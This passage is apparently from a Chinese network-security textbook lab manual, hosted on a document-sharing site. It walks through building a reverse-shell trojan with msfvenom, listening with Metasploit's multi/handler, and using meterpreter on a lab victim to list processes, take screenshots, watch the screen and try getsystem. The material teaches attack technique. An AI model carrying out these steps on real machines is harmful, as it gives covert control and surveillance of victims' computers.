计算机网络安全技术(第7版)(微课版) 实验手册---反弹木马实例.pdf

计算机网络安全技术(第7版)(微课版) 实验手册---反弹木马实例.pdf

  1. 1、本文档共8页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

使用msfvenom生成反弹木马Shell木马实

当我们需要往目标主机上传木马文件时,我们就可以利用

msfvenom生成一个木马文件,并用Metersploit进行监听,从而

就能够反弹回shell,最终控制目标主机。

我们在终端中输入ifconfig命令查看本机IP地址,可以看

到本机IP地址为:192.168.188.128,作为本次试验的攻击主机。

被入侵主机的IP地址为192.168.188.135

在kali中启动msf

打开终端模拟器,输入suroot及root密码,以root权限进行

操作。在进入root后,输入msfconsole以打开msfvenom程序。

1、先查找使用的具体语句

进入程序后,为了更准确的编写攻击语句,可以先进入msf中

利用search进行搜索具体的使用语句

(payload/windows/meterpreter/reverse_tcp默认是攻击x86

的windows机器,如需要攻击x64的windows机器可以利用

payload/windows/x64/meterpreter/reverse_tcp)

在终端处输入searchmeterpreter/reverse_tcp,在返回的

结果中可以看到结果11是本次实验所需要的攻击语句

2、利用msfvenom生成一个back.exe反弹shell的木马

如何利用msfvenom生成一个名为:back.exe反弹shell的

木马,首先生成一个Windows的木马应用程序:back.exe,并反

弹shell至192.168.188.128:4444端口。

可以利用metersploit进行监听,在终端处输入msfvenom-

pwindows/meterpreter/reverse_tcpLHOST=192.168.188.128

LPORT=4444-fexe-oback.exe

其中-p是payload,就是控制目标主机以后,要让他干什么。

具体的命令就是payload.-f是生成的后门的格式,-o是输出

文件名,LHOST是攻击发起者的IP,LPORT是受害者将要连接的

攻击者打开的端口。

通过输入该命令得到反弹shell木马:back.exe

启动msfconsole进入mataspolit开始监听

3、设置监听选项

利用multi/handler进行监听来自受害者192.168.188.135

的反弹过来的shell,

分别输入命令

useexploit/multi/handler

setpayloadwindows/meterpreter/reverse_tcp

setLHOST192.168.188.128

setLPORT4444

4、查看监听状态

在命令端中接着输入showoptions以查看监听状态,可以看

到上一步设置成功

5、开启监听

在命令端中接着输入run以开启监听

6、在受害主机上运行back.exe

将生成的back.exe移至受害主机,并在受害主机点击运行

back.exe

7.查看监听情况

可以看到msf监听连接成功并创建meterpreter会话

8.meterpreter简单系统命令

1)查看受害主机用户

在终端处输入getuid来查看受害主机用户,可以看到受害主

机的用户名

2)查看受害主机进程

在终端处输入ps命令来获取目标主机上正在运行的进程信息

3)查看受害主机系统信息

在终端处输入sysinfo以查看受害主机系统信息,可以看到

受害主机是一台系统为window7的主机

4)对目标主机进行截图

在终端处输入screenshot可以看到截图保存在

/home/admin123文件夹下

5)查看截图

新打开一个终端,并在终端下输入ls查看截图是否存在

6)查看受害主机画面

在终端处输入runvnc可以远程实时监控目标机的画面

常用命令

getuid查看当前权限

getsystem尝试获取system权限

s

您可能关注的文档

文档评论(0)

xiaobao + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档